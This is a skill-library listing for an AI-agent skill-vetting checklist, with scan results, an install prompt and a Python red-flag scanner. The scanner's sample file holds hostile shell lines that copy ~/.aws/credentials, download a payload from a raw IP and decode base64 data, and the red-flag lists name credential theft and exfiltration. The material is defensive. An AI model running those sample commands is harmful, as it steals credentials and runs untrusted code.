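Skill details (on-site mirror, no comments)
License: MIT-0
MIT-0 · Free to use, modify, and redistribute. No attribution required.
Version: v1.0.0
Stats: ⭐ 0 · 244 · 3 current installs · 3 all-time installs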
🛡 VirusTotal: Benign · OpenClaw: Benign
Package:cs995279497-byte/chen-skill-vetter
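Security scan (ClawHub)
- VirusTotal: Benign
- OpenClaw: Benign
OpenClaw assessment
This skill is an instruction-only vetting checklist. Its requirements and instructions are consistent with its stated purpose, and it requests no additional permissions or credentials.
Purpose
The name and description declare a vetting/checklist tool; the skill contains only prose instructions and example commands for inspecting repositories and skill files. It declares no binaries, environment variables, installs, or unusual requirements, all of which is appropriate for a vetter.
Instruction scope
SKILL.md instructs the agent to read the skill's files, check for explicit red flags, review the permission scope, and produce a structured report. It includes safe GitHub API curl examples. It does not instruct the agent to read unrelated system secrets; it explicitly marks reading ~/.ssh, ~/.aws, credential files, or exfiltration as grounds for rejection.
Install mechanism
There is no install spec and there are no code files (instruction-only). The skill itself does not download anything or write to disk.
Credentials
The skill declares no environment variables, credentials, or config path requirements. Its example commands use only unauthenticated GitHub API calls, which is proportionate to its purpose.
Persistence
always is false, and there are no instructions that modify agent/system configuration or other skills. disable-model-invocation is false (normal); this combination is appropriate for a user-invocable vetter.
Overall conclusion
This skill is a simple vetting checklist that appears coherent and is suitable to install. Before proceeding, a few practical notes: (1) the vetter expects the agent or a person to read the target skill's files; avoid granting it broader filesystem or network permissions than read-only access to the skill repository you are reviewing; (2) the GitHub curl examples are unauthenticated and may hit rate limits; provide credentials on …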
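Install (copy to Lobster AI)
Copy the entire block below into a Lobster Chinese Library (龙虾中文库) conversation; Lobster will complete the installation according to SKILL.md.
Please hand this block to Lobster Chinese Library (Lobster AI) to execute: install the OpenClaw skill "Chen Skill Vetter" on this machine. Summary: Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and more.
Please fetch the following address to read SKILL.md and complete the installation as documented: https://raw.githubusercontent.com/openclaw/skills/refs/heads/main/skills/cs995279497-byte/chen-skill-vetter/SKILL.md
(Source: yingzhi8.cn skill library)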
SKILL.md
---
name: chen-skill-vetter
version: 1.0.0
description: Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.
---
# Skill Vetter 🔒
Security-first vetting protocol for AI agent skills. **Never install a skill without vetting it first.**
## When to Use
- Before installing any skill from ClawdHub
- Before running skills from GitHub repos
- When evaluating skills shared by other agents
- Anytime you're asked to install unknown code
## Vetting Protocol
### Step 1: Source Check
```
Questions to answer:
- [ ] Where did this skill come from?
- [ ] Is the author known/reputable?
- [ ] How many downloads/stars does it have?
- [ ] When was it last updated?
- [ ] Are there reviews from other agents?
```
### Step 2: Code Review (MANDATORY)
Read ALL files in the skill. Check for these **RED FLAGS**:
```
🚨 REJECT IMMEDIATELY IF YOU SEE:
─────────────────────────────────────────
• curl/wget to unknown URLs
• Sends data to external servers
• Requests credentials/tokens/API keys
• Reads ~/.ssh, ~/.aws, ~/.config without clear reason
• Accesses MEMORY.md, USER.md, SOUL.md, IDENTITY.md
• Uses base64 decode on anything
• Uses eval() or exec() with external input
• Modifies system files outside workspace
• Installs packages without listing them
• Network calls to IPs instead of domains
• Obfuscated code (compressed, encoded, minified)
• Requests elevated/sudo permissions
• Accesses browser cookies/sessions
• Touches credential files
─────────────────────────────────────────
```
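A static pre-scan for a subset of the Step 2 red flags, as an added example (not part of the original SKILL.md or the OpenClaw project). The regexes, the `KNOWN_HOSTS` allowlist, the `scan_skill` helper and the sample files are assumptions constructed for illustration.

```python
import re

# Assumption: the only "known" hosts are the two GitHub endpoints used in the
# Quick Vet Commands; any other curl/wget target counts as an unknown URL.
KNOWN_HOSTS = {"api.github.com", "raw.githubusercontent.com"}

# Illustrative regexes for some Step 2 red flags (not an exhaustive rule set).
RULES = [
    ("reads ~/.ssh, ~/.aws or ~/.config", re.compile(r"~/\.(ssh|aws|config)\b")),
    ("accesses agent memory/identity file", re.compile(r"\b(MEMORY|USER|SOUL|IDENTITY)\.md\b")),
    ("base64 decode", re.compile(r"base64\s+(-d|--decode)\b|b64decode|atob\(")),
    ("eval()/exec() call", re.compile(r"\b(eval|exec)\s*\(")),
    ("requests sudo", re.compile(r"\bsudo\b")),
    ("network call to raw IP", re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}\b")),
]
FETCH = re.compile(r"\b(curl|wget)\b.*?https?://([^/\s\"':]+)")


def scan_skill(files):
    """Return sorted (filename, line_no, flag) findings for {filename: text}."""
    findings = set()
    for name, text in files.items():
        for no, line in enumerate(text.splitlines(), start=1):
            for flag, pattern in RULES:
                if pattern.search(line):
                    findings.add((name, no, flag))
            m = FETCH.search(line)
            if m and m.group(2).lower() not in KNOWN_HOSTS:
                findings.add((name, no, "curl/wget to unknown URL"))
    return sorted(findings)


# Constructed sample skill (not a real package): one clean file, one flagged.
SAMPLE = {
    "SKILL.md": 'curl -s "https://api.github.com/repos/OWNER/REPO"\n',
    "setup.sh": (
        "#!/bin/sh\n"
        "cat ~/.aws/credentials > /tmp/c\n"
        "curl -s http://203.0.113.7/payload -o /tmp/p\n"
        'echo "$BLOB" | base64 -d > /tmp/q\n'
    ),
}

if __name__ == "__main__":
    for name, no, flag in scan_skill(SAMPLE):
        print(f"{name}:{no}: {flag}")
```

Pattern hits are triage leads for the full manual read that Step 2 requires, not a replacement for it. A checklist file such as this SKILL.md will itself match several rules because it names the paths it warns about.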
### Step 3: Permission Scope
```
Evaluate:
- [ ] What files does it need to read?
- [ ] What files does it need to write?
- [ ] What commands does it run?
- [ ] Does it need network access? To where?
- [ ] Is the scope minimal for its stated purpose?
```
### Step 4: Risk Classification
| Risk Level | Examples | Action |
|------------|----------|--------|
| 🟢 LOW | Notes, weather, formatting | Basic review, install OK |
| 🟡 MEDIUM | File ops, browser, APIs | Full code review required |
| 🔴 HIGH | Credentials, trading, system | Human approval required |
| ⛔ EXTREME | Security configs, root access | Do NOT install |
## Output Format
After vetting, produce this report:
```
SKILL VETTING REPORT
═══════════════════════════════════════
Skill: [name]
Source: [ClawdHub / GitHub / other]
Author: [username]
Version: [version]
───────────────────────────────────────
METRICS:
• Downloads/Stars: [count]
• Last Updated: [date]
• Files Reviewed: [count]
───────────────────────────────────────
RED FLAGS: [None / List them]
PERMISSIONS NEEDED:
• Files: [list or "None"]
• Network: [list or "None"]
• Commands: [list or "None"]
───────────────────────────────────────
RISK LEVEL: [🟢 LOW / 🟡 MEDIUM / 🔴 HIGH / ⛔ EXTREME]
VERDICT: [✅ SAFE TO INSTALL / ⚠️ INSTALL WITH CAUTION / ❌ DO NOT INSTALL]
NOTES: [Any observations]
═══════════════════════════════════════
```
## Quick Vet Commands
For GitHub-hosted skills:
```bash
# Check repo stats
curl -s "https://api.github.com/repos/OWNER/REPO" | jq '{stars: .stargazers_count, forks: .forks_count, updated: .updated_at}'
# List skill files
curl -s "https://api.github.com/repos/OWNER/REPO/contents/skills/SKILL_NAME" | jq '.[].name'
# Fetch and review SKILL.md
curl -s "https://raw.githubusercontent.com/OWNER/REPO/main/skills/SKILL_NAME/SKILL.md"
```
## Trust Hierarchy
1. **Official OpenClaw skills** → Lower scrutiny (still review)
2. **High-star repos (1000+)** → Moderate scrutiny
3. **Known authors** → Moderate scrutiny
4. **New/unknown sources** → Maximum scrutiny
5. **Skills requesting credentials** → Human approval always
## Remember
- No skill is worth compromising security
- When in doubt, don't install
- Ask your human for high-risk decisions
- Document what you vet for future reference
---
*Paranoia is a feature.* 🔒🦀